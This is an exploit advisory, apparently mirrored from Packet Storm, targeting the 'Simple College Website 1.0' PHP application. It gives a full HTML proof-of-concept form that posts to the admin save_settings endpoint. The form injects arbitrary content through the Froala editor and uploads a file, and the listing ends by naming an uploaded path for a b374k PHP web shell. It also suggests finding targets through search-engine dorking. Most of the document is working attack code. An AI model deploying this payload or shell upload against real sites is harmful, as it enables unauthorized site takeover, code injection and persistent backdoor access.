Share
## https://sploitus.com/exploit?id=PACKETSTORM:180360
=============================================================================================================================================
| # Title : Simple College Website 1.0 WYSIWYG Settings Management Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html |
=============================================================================================================================================
poc :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Part 01 : about-us.php
[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 .
[+] Line 109 : Send the form data using fetch API (Set your target url)
[+] save payload as poc.html
[+] payload :
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Settings Management</title>
<!-- Froala Editor CSS -->
<link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">
<!-- Bootstrap CSS -->
<link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
<style>
/* Custom Styles */
#cimg {
max-width: 100%;
height: auto;
}
#preloader2 {
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: rgba(0, 0, 0, 0.5);
display: flex;
justify-content: center;
align-items: center;
z-index: 9999;
}
.form-group {
margin-bottom: 1rem;
}
.form-group label {
display: block;
margin-bottom: .5rem;
}
.form-group input, .form-group textarea {
width: 100%;
padding: .5rem;
box-sizing: border-box;
}
</style>
</head>
<body>
<div class="container">
<form id="manage-settings" method="post" enctype="multipart/form-data">
<div class="form-group">
<label for="name"> Name</label>
<input type="text" id="name" name="name" required>
</div>
<div class="form-group">
<label for="email">Email</label>
<input type="email" id="email" name="email" required>
</div>
<div class="form-group">
<label for="contact">Contact</label>
<input type="tel" id="contact" name="contact" required>
<div class="form-group">
<label for="about">About Content</label>
<textarea class="text-jqte" id="about" name="about_us"></textarea>
</div>
<div class="form-group">
<label for="img">Cover Image</label>
<input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">
<img id="cimg" src="" alt="Selected Image Preview">
</div>
<button type="submit" class="btn btn-primary">Save Settings</button>
</form>
</div>
<div class="modal fade" id="viewer_modal" role='dialog'>
<div class="modal-dialog modal-md" role="document">
<div class="modal-content">
<button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button>
<img src="" alt="">
</div>
</div>
</div>
<!-- jQuery -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<!-- Froala Editor JS -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>
<!-- Bootstrap JS (for modals) -->
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>
<script>
function displayImg(input, _this) {
if (input.files && input.files[0]) {
var reader = new FileReader();
reader.onload = function (e) {
$('#cimg').attr('src', e.target.result);
}
reader.readAsDataURL(input.files[0]);
}
}
$(document).ready(function () {
const editorInstance = new FroalaEditor('.text-jqte');
});
$('#manage-settings').submit(function (e) {
e.preventDefault();
start_load();
$.ajax({
url: 'http://127.0.0.1/college_website/admin/ajax.php?action=save_settings',
data: new FormData($(this)[0]),
cache: false,
contentType: false,
processData: false,
method: 'POST',
type: 'POST',
error: err => {
console.log(err);
},
success: function (resp) {
if (resp == 1) {
alert_toast('Data successfully saved.', 'success');
setTimeout(function () {
location.reload();
}, 1000);
}
}
});
});
window.start_load = function () {
$('body').prepend('<div id="preloader2"></div>');
}
window.end_load = function () {
$('#preloader2').fadeOut('fast', function () {
$(this).remove();
});
}
window.viewer_modal = function ($src = '') {
start_load();
var t = $src.split('.');
t = t[1];
if (t == 'mp4') {
var view = $("<video src='" + $src + "' controls autoplay></video>");
} else {
var view = $("<img src='" + $src + "' />");
}
$('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();
$('#viewer_modal .modal-content').append(view);
$('#viewer_modal').modal({
show: true,
backdrop: 'static',
keyboard: false,
focus: true
});
end_load();
}
window.uni_modal = function ($title = '', $url = '', $size = "") {
start_load();
$.ajax({
url: $url,
error: err => {
console.log(err);
alert("An error occurred");
},
success: function (resp) {
if (resp) {
$('#uni_modal .modal-title').html($title);
$('#uni_modal .modal-body').html(resp);
if ($size != '') {
$('#uni_modal .modal-dialog').addClass($size);
} else {
$('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md");
}
$('#uni_modal').modal({
show: true,
backdrop: 'static',
keyboard: false,
focus: true
});
end_load();
}
}
});
}
window._conf = function ($msg = '', $func = '', $params = []) {
$('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")");
$('#confirm_modal .modal-body').html($msg);
$('#confirm_modal').modal('show');
}
window.alert_toast = function ($msg = 'TEST', $bg = 'success') {
$('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning');
if ($bg == 'success')
$('#alert_toast').addClass('bg-success');
if ($bg == 'danger')
$('#alert_toast').addClass('bg-danger');
if ($bg == 'info')
$('#alert_toast').addClass('bg-info');
if ($bg == 'warning')
$('#alert_toast').addClass('bg-warning');
$('#alert_toast .toast-body').html($msg);
$('#alert_toast').toast({ delay: 3000 }).toast('show');
}
</script>
</body>
</html>
[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================